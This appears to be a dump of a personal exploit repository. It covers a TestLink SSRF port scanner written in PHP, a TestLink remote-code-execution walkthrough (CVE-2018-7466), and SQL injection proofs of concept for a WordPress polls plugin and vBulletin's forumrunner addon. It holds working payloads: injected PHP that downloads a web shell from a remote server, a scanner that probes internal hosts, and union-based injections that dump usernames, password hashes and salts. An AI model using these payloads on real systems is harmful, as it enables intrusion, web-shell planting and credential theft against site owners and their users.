"localhost:445", script is trying to connect to localhost on port 445. Here, if machine is having port 445 open, script connects to port 445 but as we know port is running SMB service and SQL server is not there, script consider that SQL server is dead on this port. Script print SQL server message "MySQL server has gone away" (in my case it was MySQL). Another case, if we specify the value of "databasehost" parameter as "localhost:1337" and here port 1337 is not open, script shows SQL server error message " No connection could be made because the target machine actively refused it." which clearly indicates that port 1337 is not open. 17 | 18 | Example of Open port enumeration 19 | ================================ 20 | Let's consider case of internal IP on same network. We have server IP 192.168.56.101 which is hosting TestLink code hosted on it and one Linux server 21 | with IP 192.168.56.105 having SSH port open on it. If we specify the value of "databasehost" parameter as "192.168.56.105:22", TestLink script try to connect to IP 192.168.56.105 on Port 22 and print SQL server message "MySQL server has gone away" as port s open but it's having SSH running on it. This error message indicates that port on IP 192.168.56.105 is open. 22 | 23 | Example of non-existing IP 24 | ========================== 25 | Now consider one more case in which we don't have any machine with IP 192.168.56.145 on network and we try to connect on any port, script responds 26 | with SQL server message " A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond" which indicates that IP is not live. 27 | 28 | Above scenario can be use to demonstrate the issue of scanning network IPs and their open ports by an attacker using TestLink script. 29 | 30 | Steps to Reproduce (Manual): 31 | ============================ 32 | 1. Configure your web browser with any proxy software (i am using Burp Suite). 33 | 2. Access below mentioned URL in web browser and click "Continue" button: 34 | http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on 35 | 3. Turn on Burp Interception. 36 | 4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button. 37 | 5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination. 38 | 6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater. 39 | 7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away". 40 | 8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater. 41 | 9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond". 42 | 43 | Automated script in action 44 | ========================== 45 | 46 | Vulnerable Testlink installation directory is "http://localhost/testlink-1.9.19/". 47 | Target which we are scanning is: 192.168.0.2 48 | 49 | ![POC 1](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20(version%20%3C%3D%201.9.19)%20Server%20Side%20Request%20Forgery/POCs/script1.png) 50 | 51 | Result after finishing the scanning 52 | 53 | ![POC 2](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20(version%20%3C%3D%201.9.19)%20Server%20Side%20Request%20Forgery/POCs/script2.png) 54 | 55 | --==[[ Greetz To ]]==-- 56 | 57 | Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 58 | Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, 59 | Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 60 | Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash 61 | 62 | --==[[Love to]]==-- 63 | 64 | My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP 65 | Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri, Thecolonial and Don(Deepika kaushik) 66 | -------------------------------------------------------------------------------- /TestLink (version <= 1.9.19) Server Side Request Forgery/testlink_ssrf.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | --==[[Indishell forever]]==-- 16 | 17 | 18 | 19 | 20 | 184 | 185 | 206 | 207 | '; 208 | 209 | 210 | 211 | 212 | echo $head ; 213 | 214 | echo ' 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 |
224 | 225 | --==[[ TestLink SSRF Exploit POC]]==--
226 | --==[[ With Love From IndiShell Crew]]==-- 227 |
228 | 229 | 230 |
235 | 236 | 237 | 238 | ####################################################################################################################################
239 | 240 | -==[[Greetz to]]==--
zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL
241 | 242 | --==[[Love to]]==--
# My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3
243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | #################################################################################################################################### 251 | 252 | 253 | 254 |
255 | 256 |
257 | 258 | 259 | '; 260 | 261 | ?> 262 |
263 | 264 | 275 |
265 | 266 |
267 | Target URL: 268 |

269 | Ports to be scan: 270 | 271 |     272 | Host to be scan: 273 | 274 |
276 | 277 |
278 | 279 | 280 | alert('Target is unreachable, Get me something working :|');
"; 329 | 330 | die(); 331 | } 332 | 333 | //////////////////////////// 334 | ///Time to get back to work 335 | /////////////////////////// 336 | 337 | else 338 | { 339 | 340 | echo "
"; 341 | 342 | 343 | 344 | if(!(strstr($list,","))=='') 345 | { 346 | 347 | $all_ports=array(); 348 | $ch = array(); 349 | $content = array(); 350 | $open = array(); 351 | $closed = array(); 352 | 353 | $all_ports=explode(',',$list); 354 | $n_time='5'; 355 | 356 | $t1 = microtime(true); 357 | $mh = curl_multi_init(); 358 | 359 | $i = 0; 360 | 361 | foreach($all_ports as $port) 362 | 363 | { 364 | 365 | $payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword="; 366 | 367 | $ch[$i] = curl_init(); 368 | curl_setopt($ch[$i], CURLOPT_URL, $url_auth); 369 | curl_setopt($ch[$i], CURLOPT_HEADER, 0); 370 | curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5); 371 | curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); 372 | curl_setopt($ch[$i], CURLOPT_POST, 1); 373 | curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload); 374 | 375 | curl_multi_add_handle($mh, $ch[$i]); 376 | $i ++; 377 | } 378 | 379 | $active = null; 380 | do 381 | { 382 | $mrc = curl_multi_exec($mh, $active); 383 | usleep(200000); // limit requests for a while 384 | } while ($active); 385 | 386 | 387 | 388 | $i = 0; 389 | foreach ($ch AS $i => $c) 390 | { 391 | $content[$i] = curl_multi_getcontent($c); 392 | curl_multi_remove_handle($mh, $c); 393 | } 394 | 395 | curl_multi_close($mh); 396 | 397 | for($j=0;$j < count($content);$j++) 398 | { 399 | 400 | if(!(strstr($content[$j],'refused'))=='') 401 | { 402 | // echo "Port $all_ports[$j] is closed
"; 403 | 404 | } 405 | 406 | else 407 | { 408 | //echo "port $all_ports[$j] is open 8-)
"; 409 | array_push($open,$all_ports[$j]); 410 | } 411 | 412 | 413 | 414 | } 415 | 416 | echo ' 417 | '; 418 | 419 | foreach($open as $in_open) 420 | 421 | { 422 | 423 | echo ''; 424 | 425 | } 426 | echo '
--==[[ Open Ports on Target server '.$h0st.' ]]==--
Port '.$in_open.'
'; 427 | 428 | 429 | 430 | } 431 | else 432 | { 433 | 434 | } 435 | } 436 | 437 | 438 | 439 | 440 | } 441 | 442 | echo "Developed By 1046 at IndiShell Lab"; 443 | 444 | ?> 445 | -------------------------------------------------------------------------------- /TestLink -below 1.9.17- Remote Code Execution/README.md: -------------------------------------------------------------------------------- 1 | # Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046) 2 | Vendor Home Page: http://testlink.org 3 | 4 | Disovered At: Indishell Lab 5 | 6 | CVE ID: CVE-2018-7466 7 | 8 | /////////// 9 | //OverView 10 | /////////// 11 | 12 | Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution. 13 | Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in "TestLink DB login" field. 14 | After successful installation, PHP code will get save in config file. 15 | 16 | 17 |

Exploitation

18 | 19 | During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further. 20 | 21 | Script save MySQL server host, username and password in config file. 22 | 23 | Here attacker can take advantage of this process to write PHP code in config file. 24 | 25 | To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file). 26 | 27 | To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps 28 | 29 | -> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line 30 | 31 | skip-networking 32 | to 33 | # skip-networking 34 | 35 | and 36 | 37 | bind-address = some_ip 38 | to 39 | #bind-address = some_ip 40 | 41 | save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP 42 | 43 | Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script. 44 | 45 | When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname). 46 | 47 | "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" 48 | 49 | Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name 50 | "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters 51 | 52 | http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt 53 | 54 | It will dump PHP web shell in base directory with name ica.php. 55 | 56 | ![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png) 57 | 58 | --==[[ Greetz To ]]==-- 59 | 60 | Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 61 | Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, 62 | Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 63 | Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash 64 | 65 | --==[[Love to]]==-- 66 | 67 | My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP 68 | Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) 69 | 70 | 71 | -------------------------------------------------------------------------------- /TestLink -below 1.9.17- Remote Code Execution/testlink POC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/TestLink -below 1.9.17- Remote Code Execution/testlink POC.png -------------------------------------------------------------------------------- /WordPress Polls plugin-1.2.4- SQL Injection vulnerability/README.md: -------------------------------------------------------------------------------- 1 | Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability 2 |
3 | Vulnerable version:<=1.2.4 4 |
Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip 5 | 6 | //////////////////////// 7 |
/// Overview: 8 |
//////////////////////// 9 |
10 |
WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file. 11 | 12 | 13 | //////////////// 14 |
15 | /// POC //// 16 |
17 | /////////////// 18 |
19 | SQL Injection payload to enumerate tables 20 |
---------------------------------------------- 21 |
http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues 22 |
Post data 23 |
question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5 24 | 25 | 26 | POC
27 | 28 |
29 | 30 | --==[[ Greetz To ]]==-- 31 | Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, 32 |
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, 33 |
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256 34 |
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash 35 |
36 | --==[[ Love To ]]==-- 37 |
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, 38 |
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) 39 | 40 | -------------------------------------------------------------------------------- /WordPress Polls plugin-1.2.4- SQL Injection vulnerability/injected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/WordPress Polls plugin-1.2.4- SQL Injection vulnerability/injected.png -------------------------------------------------------------------------------- /vBulletin-forum-runner-SQL-Injection/README.md: -------------------------------------------------------------------------------- 1 | # vBulletin-forum-runner-SQL-Injection 2 | VBulletin version 3.6.0 through 4.2.3 are vulnerable to SQL injection vulnerability in vBulletin core forumrunner addon. 3 | Vulnerability was analized and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/) 4 | so credit goes to Dantalion only :) 5 | 6 | //////////////// 7 | /// POC //// 8 | /////////////// 9 | 10 | SQL Injection payload to enumerate table names 11 | ---------------------------------------------- 12 | http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- - 13 | 14 | 15 | SQL Injection payload to enumerate column names from table "user" 16 | ---------------------------------------------------------------- 17 | http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- - 18 | 19 | 20 | SQL Injection payload to enumerate username,password hash and salt from "user" table 21 | ---------------------------------------------------------------------------------- 22 | http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- - 23 | 24 | ///////////////// 25 | exploit code ends here 26 | --------------------------------------------------------------------------------